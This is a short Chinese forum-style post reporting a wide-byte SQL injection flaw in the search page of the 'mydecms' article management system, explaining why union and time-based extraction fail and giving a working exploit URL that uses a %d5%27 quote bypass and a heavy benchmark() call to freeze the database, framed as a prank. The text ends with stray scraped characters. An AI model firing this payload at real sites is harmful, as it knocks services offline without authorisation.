mydecms 贤臣文章管理系统bug

其实程序没有多大的问题。。最起码我这样的菜鸟找不出来了

好吧说说bug吧 程序设定字符为 gbk 于是宽字节注入产生了

但是蛋疼的是作者让我们提交的变量不多。就找了前台的搜索

限制了字节为 50.。而且带人两次查询

所以 union失败 延迟注入字节不够。后台账号秘密都是md5加密的 其他的我没看了。

这个bug用来恶作剧还是可以的

exphttp://127.0.0.1/biaozhun/search.php?key=789%d5%27)%20%20and%20id=benchmark(1800000,md5(14411441))%2390 Security Team4 o6 c: v6 L: x) C& |' V& l

直接让系统卡死了